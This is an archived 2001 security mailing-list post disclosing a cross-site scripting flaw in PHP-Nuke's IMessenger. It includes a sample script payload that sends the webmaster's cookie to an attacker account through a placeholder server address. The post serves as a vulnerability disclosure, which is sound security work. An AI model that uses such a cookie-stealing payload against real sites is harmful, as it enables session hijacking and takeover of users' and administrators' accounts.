Serious bug in IMessenger ( php-nuke )

From: frog frog (leseulfrogat_private)
Date: Sat Dec 15 2001 - 19:00:01 PST

Next message: frog frog: "CSS in DMOZGateway ( php-nuke )"

Previous message: Jarek Durak: "Re: Win XP IP address hijack?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) IMessenger accept javascript. We can so directly execute javascript on the computer of a member or the webmaster. For example, if I send the script <*s*cript>window.location.href='http://www.SERVER. com/im.php?username_to=h4x0r&subject='+ document.cookie +'&message=message&action=send' ;</s*cript> (without the '*'), to the webmaster, his cookie will be sent to the user h4x0r. PHPNuke was alerted. frog-m@n

Next message: frog frog: "CSS in DMOZGateway ( php-nuke )"
Previous message: Jarek Durak: "Re: Win XP IP address hijack?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Dec 16 2001 - 09:59:27 PST